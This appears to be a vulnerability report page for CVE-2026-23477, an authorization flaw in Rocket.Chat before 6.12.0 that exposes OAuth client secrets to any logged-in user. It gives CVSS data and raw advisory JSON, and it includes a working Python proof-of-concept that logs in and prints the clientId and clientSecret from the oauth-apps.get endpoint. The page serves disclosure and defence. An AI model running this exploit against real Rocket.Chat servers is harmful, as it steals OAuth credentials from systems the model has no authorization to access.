Security Vulnerability Report
CVE-2026-23477 CVSS 7.7 HIGH


Published: 2026-01-14 19:16:48
Last Modified: 2026-01-26 18:03:24

Description

Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions up to 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. This endpoint returns an OAuth application, as long as the user knows its ID, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* - VULNERABLE
Rocket.Chat < 6.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-23477 PoC - Rocket.Chat OAuth Apps Information Disclosure
# Target: Rocket.Chat < 6.12.0
# Endpoint: GET /api/v1/oauth-apps.get

TARGET_URL = "http://target-rocketchat.com"
USERNAME = "[email protected]"
PASSWORD = "password123"
TARGET_OAUTH_APP_ID = "TARGET_OAUTH_APP_ID"


def exploit():
    # Step 1: Authenticate with the target Rocket.Chat instance
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/v1/login"
    login_data = {"user": USERNAME, "password": PASSWORD}

    print("[*] Authenticating to Rocket.Chat...")
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return None

    auth_data = response.json()
    if auth_data.get("status") != "success":
        print("[-] Authentication failed")
        return None

    user_id = auth_data["data"]["userId"]
    auth_token = auth_data["data"]["authToken"]
    print(f"[+] Authenticated successfully. UserID: {user_id}")

    # Step 2: Request OAuth app information without proper authorization
    # (the endpoint only checks that the caller is authenticated, not its role)
    headers = {"X-Auth-Token": auth_token, "X-User-Id": user_id}
    oauth_url = f"{TARGET_URL}/api/v1/oauth-apps.get?id={TARGET_OAUTH_APP_ID}"
    print(f"[*] Requesting OAuth app information: {oauth_url}")
    response = session.get(oauth_url, headers=headers)

    if response.status_code == 200:
        oauth_data = response.json()
        if oauth_data.get("success"):
            app_info = oauth_data.get("oauthApp", {})
            print("[+] OAuth App Information Retrieved:")
            print(f"    Client ID: {app_info.get('clientId')}")
            print(f"    Client Secret: {app_info.get('clientSecret')}")
            print(f"    App Name: {app_info.get('name')}")
            print(f"    Active: {app_info.get('active')}")
            return app_info
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
    return None


if __name__ == "__main__":
    exploit()
```

References

https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2 (Exploit, Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23477", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:47.990", "lastModified": "2026-01-26T18:03:24.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions up to 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. This endpoint returns an OAuth application, as long as the user knows its ID, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0."}, {"lang": "es", "value": "Rocket.Chat es una plataforma de comunicaciones de código abierto, segura y totalmente personalizable. En las versiones de Rocket.Chat hasta la 6.12.0, el endpoint de la API GET /api/v1/oauth-apps.get está expuesto a cualquier usuario autenticado, independientemente de su rol o permisos. Este endpoint devuelve una aplicación OAuth, siempre que el usuario conozca su ID, incluyendo campos potencialmente sensibles como client_id y client_secret. Esta vulnerabilidad está corregida en la 6.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.12.0", "matchCriteriaId": "BDDC551C-B721-4452-91D8-D53E1316D806"}]}]}], "references": [{"url": "https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
```